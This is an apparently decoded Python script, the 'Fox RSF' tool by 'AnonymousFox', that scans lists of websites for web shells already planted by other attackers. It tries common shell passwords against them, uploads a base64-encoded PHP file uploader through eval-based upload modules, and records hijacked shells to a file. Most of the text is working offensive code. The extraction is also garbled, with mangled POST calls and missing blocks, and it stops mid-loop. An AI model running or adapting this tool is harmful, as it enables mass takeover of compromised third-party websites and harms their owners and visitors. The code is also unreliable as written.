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PHP Decode
import sys import requests , re , datetime from multiprocessing.dummy import Pool from ..
Decoded Output download
<? import sys
import requests , re , datetime
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import Style
from pprint import pprint
from colorama import init
fr = Fore.RED
fc = Fore.CYAN
fw = Fore.WHITE
fg = Fore.GREEN
sd = Style.DIM
sn = Style.NORMAL
sb = Style.BRIGHT
print """
{}[#]{} Create By ::
{} ___ ______
{} / _ \ | ___|
{}/ /_\ \_ __ ___ _ __ _ _ _ __ ___ ___ _ _ ___ | |_ _____ __
{}| _ | '_ \ / _ \| '_ \| | | | '_ ` _ \ / _ \| | | / __|| _/ _ \ \/ /
{}| | | | | | | (_) | | | | |_| | | | | | | (_) | |_| \__ \| || (_) > <
{}\_| |_/_| |_|\___/|_| |_|\__, |_| |_| |_|\___/ \__,_|___/\_| \___/_/\_\
{} __/ |
{} |___/ {} Fox RSF {}[Priv8]
""".format(fr, fw, fg, fr, fg, fr, fg, fr, fg, fr, fw, fg, fr, fg)
target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
except IndexError:
path = str(sys.argv[0]).split('\')
[!] Enter <'+path[len(path)-1] + '> <sites.txt>')
print ' {}[1] WordPress'.format(fg)
print ' {}[2] Joomla'.format(fg)
print ' {}[3] Other'.format(fg)
print ' [4] WordPress & Joomla & Other{} => {}(This option is not recommended if the list is large)'.format(fg,fr)
print " {}[0] Exit".format(fr)
w = int(raw_input('
--> : '))
print ''
def URL(url):
if url[-1] == "/":
pattern = re.compile('(.*)/')
site = re.findall(pattern,url)
url = site[0]
if url[:7] != "http://" and url[:8] != "https://":
url = "http://" + url
return url
def WordPress1(site):
site = URL(site)
SH1 = site+'/wp-content/plugins/upspy/index.php'
SH2 = site+'/wp-content/plugins/ubh/index.php'
SH3 = site+'/wp-content/plugins/vwcleanerplugin/bump.php?cache'
SH4 = site+'/wp-content/themes/gaukingo/db.php'
SH5 = site+'/wp-content/plugins/three-column-screen-layout/db.php'
SH6 = site+'/wp-content/plugins/xichang/x.php?xi'
SH7 = site+'/wp-content/plugins/html404/index.html'
SH8 = site+'/wp-content/plugins/wp-db-ajax-made/wp-ajax.php'
SH9 = site+'/wp-admin/shapes.php'
SH10 = site+'/XxX.php'
SH11 = site+'/Marvins.php'
SH12 = site+'/wp-includes/css/modules.php'
SH13 = site+'/olux.php'
SH15 = site+'/indoxploit.php'
SH19 = site+'/wso.php'
SH20 = site+'/wp-content/plugins/css-ready-sel/file.php'
SH21 = site+'/wp-content/plugins/css-ready/file.php'
SH22 = site+'/wp-content/think.php'
try :
modules_check = requests.get(SH12,timeout=15).content
wso_check = requests.get(SH19,timeout=15).content
except :
password_nhzgrf = {'pass':'nhzgrf'}
password_root = {'pass':'root'}
password_r00t = {'pass':'r00t'}
password_admin = {'pass':'admin'}
password_t00r = {'pass':'t00r'}
password_123 = {'pass':'123'}
password_1234 = {'pass':'1234'}
password_12345 = {'pass':'12345'}
password_123456 = {'pass':'123456'}
password_123123 = {'pass':'123123'}
password_123321 = {'pass':'123321'}
password_123456789 = {'pass':'123456789'}
password_1234567890 = {'pass':'1234567890'}
password_haurgeulis = {'pass':'haurgeulis'}
password_rehan = {'password':'rehan'}
#modules_upload2 = {'itongtong':'eval(base64_decode("JGZvPWZvcGVuKCJGMHgucGhwIiwidyIpOwpmd3JpdGUoJGZvLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21WamFHOGdJa2hoWTJ0bFpDQkNlU0JCYm05dWVXMXZkWE5HYjNoY2JpSTdEUXA3RFFva2MyRjNNU0E5SUNSZlJrbE1SVk5iSjJacGJHVW5YVnNuZEcxd1gyNWhiV1VuWFRzTkNpUnpZWGN5SUQwZ0pGOUdTVXhGVTFzblptbHNaU2RkV3lkdVlXMWxKMTA3RFFwbFkyaHZJQ0k4Wm05eWJTQnRaWFJvYjJROUoxQlBVMVFuSUdWdVkzUjVjR1U5SjIxMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFblBnMEtQR2x1Y0hWMElIUjVjR1U5SjJacGJHVW5ibUZ0WlQwblptbHNaU2NnTHo0TkNqeHBibkIxZENCMGVYQmxQU2R6ZFdKdGFYUW5JSFpoYkhWbFBTZDFjR3h2WVdRZ2MyaGxiR3duSUM4K0RRbzhMMlp2Y20wK0lqc05DbTF2ZG1WZmRYQnNiMkZrWldSZlptbHNaU2drYzJGM01Td2tjMkYzTWlrN0RRcDlEUW8vUGc9PScpKTs="));'}
#modules_upload3 = {'itongtong':'eval(base64_decode("JGZvPWZvcGVuKCRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi93cC1jb250ZW50L3VwbG9hZHMvRjB4LnBocCIsInciKTsKZndyaXRlKCRmbyxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSWtoaFkydGxaQ0JDZVNCQmJtOXVlVzF2ZFhOR2IzaGNiaUk3RFFwN0RRb2tjMkYzTVNBOUlDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhUc05DaVJ6WVhjeUlEMGdKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwN0RRcGxZMmh2SUNJOFptOXliU0J0WlhSb2IyUTlKMUJQVTFRbklHVnVZM1I1Y0dVOUoyMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRW5QZzBLUEdsdWNIVjBJSFI1Y0dVOUoyWnBiR1VuYm1GdFpUMG5abWxzWlNjZ0x6NE5DanhwYm5CMWRDQjBlWEJsUFNkemRXSnRhWFFuSUhaaGJIVmxQU2QxY0d4dllXUWdjMmhsYkd3bklDOCtEUW84TDJadmNtMCtJanNOQ20xdmRtVmZkWEJzYjJGa1pXUmZabWxzWlNna2MyRjNNU3drYzJGM01pazdEUXA5RFFvL1BnPT0nKSk7"));'}
if 'United Tunsian Scammers' in requests.get(SH1,timeout=15).content :
conspy = requests.get(site+'/wp-content/plugins/upspy/con.php',timeout=15).content
upspy = requests.get(site+'/wp-content/plugins/upspy/up.php',timeout=15).content
wsospy = requests.get(site+'/wp-content/plugins/upspy/sllolx.php',timeout=15).content
if 'Web Console' in conspy :
print ' -| '+site +'/ --> {}[UPspy]'.format(fg)
if '' in upspy :
if 'WSO 2.6' in wsospy :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/upspy/con.php#ubh@ubh | '+site+'/wp-content/plugins/upspy/up.php | '+site+'/wp-content/plugins/upspy/sllolx.php
else :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/upspy/con.php#ubh@ubh | '+site+'/wp-content/plugins/upspy/up.php
else :
if 'WSO 2.6' in wsospy :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/upspy/con.php#ubh@ubh | '+site+'/wp-content/plugins/upspy/sllolx.php
else :
with open('Shells.txt', mode='a') as d:
elif '' in upspy :
print ' -| '+site +'/ --> {}[UPspy]'.format(fg)
if 'WSO 2.6' in wsospy :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/upspy/up.php | '+site+'/wp-content/plugins/upspy/sllolx.php
else :
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.6' in wsospy :
print ' -| '+site +'/ --> {}[UPspy]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif 'United Bangladeshi Hackers' in requests.get(SH2,timeout=15).content :
conubh = requests.get(site+'/wp-content/plugins/ubh/con.php',timeout=15).content
upubh = requests.get(site+'/wp-content/plugins/ubh/up.php',timeout=15).content
if 'Web Console' in conubh :
print ' -| '+site +'/ --> {}[UBH]'.format(fg)
if '' in upubh :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/ubh/con.php#ubh@ubh | '+site+'/wp-content/plugins/ubh/up.php
else :
with open('Shells.txt', mode='a') as d:
elif '' in upubh :
print ' -| '+site +'/ --> {}[UBH]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif '[UNAME]:' in requests.get(SH3,timeout=15).content :
print ' -| '+site +'/ --> {}[VWCleaner]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'xichang1' in requests.get(SH6,timeout=15).content :
print ' -| '+site +'/ --> {}[xichang]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Hckd By? Html404' in requests.get(SH7,timeout=15).content :
xccc = requests.get(site+'/wp-content/plugins/html404/xccc.php',timeout=15).content
cry = requests.get(site+'/wp-content/plugins/html404/cry.php.pjpeg',timeout=15).content
wso25 = requests.get(site+'/wp-content/plugins/html404/wso25.php',timeout=15).content
if 'Html404' in xccc :
print ' -| '+site +'/ --> {}[Html404]'.format(fg)
if 'JEMBOETS' in cry :
if 'WSO 2.5' in wso25 :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/html404/xccc.php | '+site+'/wp-content/plugins/html404/cry.php.pjpeg | '+site+'/wp-content/plugins/html404/wso25.php
else :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/html404/xccc.php | '+site+'/wp-content/plugins/html404/cry.php.pjpeg
else :
if 'WSO 2.5' in wso25 :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/html404/xccc.php | '+site+'/wp-content/plugins/html404/wso25.php
else :
with open('Shells.txt', mode='a') as d:
elif 'JEMBOETS' in cry :
print ' -| '+site +'/ --> {}[Html404]'.format(fg)
if 'WSO 2.5' in wso25 :
with open('Shells.txt', mode='a') as d:
d.write(site+'/wp-content/plugins/html404/cry.php.pjpeg | '+site+'/wp-content/plugins/html404/wso25.php
else :
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.5' in wso25 :
print ' -| '+site +'/ --> {}[Html404]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif '<title>Mister Spy</title>' in requests.get(SH9,timeout=15).content :
print ' -| '+site +'/ --> {}[MisterSpy]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.6' in requests.get(SH13,timeout=15).content :
print ' -| '+site +'/ --> {}[Olux]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>IndoXploit</title>' in requests.get(SH15,timeout=15).content :
print ' -| '+site +'/ --> {}[IndoXploit]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '#p@@#' in requests.get(SH25,timeout=15).content :
print ' -| '+site +'/ --> {}[License]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<' not in modules_check and '/wp-includes/css' in modules_check :
upShell =,data=modules_upload,timeout=15)
check = requests.get(site+'/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH12+'#itongtong [POST] | {}/F0x.php [Succeeded]
else :
upShell =,data=modules_upload2,timeout=15)
check = requests.get(site+'/wp-includes/css/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH12+'#itongtong [POST] | {}/wp-includes/css/F0x.php [Succeeded]
else :
upShell =,data=modules_upload3,timeout=15)
check = requests.get(site+'/wp-content/uploads/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH12+'#itongtong [POST] | {}/wp-content/uploads/F0x.php [Succeeded]
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif ' name=pass' in requests.get(SH4,timeout=15).content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 =,data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 =,data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 =,data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 =,data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 =,data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 =,data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 =,data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis =,data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Gaukingo]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif ' name=pass' in requests.get(SH5,timeout=15).content :
nhzgrf_ScreenLayout =,data=password_nhzgrf,timeout=15).content
if 'WSO' in nhzgrf_ScreenLayout :
print ' -| '+site +'/ --> {}[ScreenLayout]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif ' name=pass' in requests.get(SH8,timeout=15).content :
proot_Ajax =,data=password_root,timeout=15).content
if 'WSO' in proot_Ajax :
print ' -| '+site +'/ --> {}[Ajax]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
elif 'Tryag File Manager' in requests.get(SH10,timeout=15).content :
print ' -| '+site +'/ --> {}[Tryag]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'config root man' in requests.get(SH11,timeout=15).content :
print ' -| '+site +'/ --> {}[Marvins]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Windows' in wso_check and 'Upload file:' in wso_check :
print ' -| '+site +'/ --> {}[WSO]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Tryag File Manager' in requests.get(SH20,timeout=15).content :
print ' -| '+site +'/ --> {}[CssReadySel]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Tryag File Manager' in requests.get(SH21,timeout=15).content :
print ' -| '+site +'/ --> {}[CssReady]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>Legion</title>' in requests.get(SH22,timeout=15).content :
print ' -| '+site +'/ --> {}[Legion]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
except :
print ' -| '+site +' --> {}[Failed]'.format(fr)
def Other(site):
try :
site = URL(site)
SH1_O = site+'/olux.php'
SH2_O = site+'/indoxploit.php'
SH3_O = site+'/Marvins.php'
SH4_O = site+'/wso.php'
SH5_O = site+'/images/'
SH6_O = site+'/uploads/'
SH7_O = site+'/img/'
SH8_O = site+'/upload/'
SH9_O = site+'/gallery/'
SH10_O = site+'/files/'
SH11_O = site+'/pdf/'
SH12_O = site+'/docs/'
SH13_O = site+'/up.php'
SH14_O = site+'/upload.php'
SH15_O = site+'/shell.php'
password_nhzgrf = {'pass':'nhzgrf'}
password_root = {'pass':'root'}
password_r00t = {'pass':'r00t'}
password_admin = {'pass':'admin'}
password_t00r = {'pass':'t00r'}
password_123 = {'pass':'123'}
password_1234 = {'pass':'1234'}
password_12345 = {'pass':'12345'}
password_123456 = {'pass':'123456'}
password_123123 = {'pass':'123123'}
password_123321 = {'pass':'123321'}
password_123456789 = {'pass':'123456789'}
password_1234567890 = {'pass':'1234567890'}
password_haurgeulis = {'pass':'haurgeulis'}
password_rehan = {'password':'rehan'}
pattern_php = re.compile('<a href="(.*).php">')
if 'WSO 2.6' in requests.get(SH1_O,timeout=15).content :
print ' -| '+site +'/ --> {}[Olux]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>IndoXploit</title>' in requests.get(SH2_O,timeout=15).content :
print ' -| '+site +'/ --> {}[IndoXploit]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>IndoXploit</title>' in requests.get(SH2_O,timeout=15).content :
print ' -| '+site +'/ --> {}[IndoXploit]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
wso_check = requests.get(SH4_O,timeout=15).content
if 'Windows' in wso_check and 'Upload file:' in wso_check :
print ' -| '+site +'/ --> {}[WSO]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
images_check = requests.get(SH5_O,timeout=15).content
if 'Index of' in images_check and '.php' in images_check :
shells = []
if re.findall(pattern_php,images_check):
shells = re.findall(pattern_php,images_check)
for shell in shells:
sh_check = requests.get(SH5_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
uploads_check = requests.get(SH6_O,timeout=15).content
if 'Index of' in uploads_check and '.php' in uploads_check :
shells = []
if re.findall(pattern_php,uploads_check):
shells = re.findall(pattern_php,uploads_check)
for shell in shells:
sh_check = requests.get(SH6_O+shell+'.php',timeout=15).content
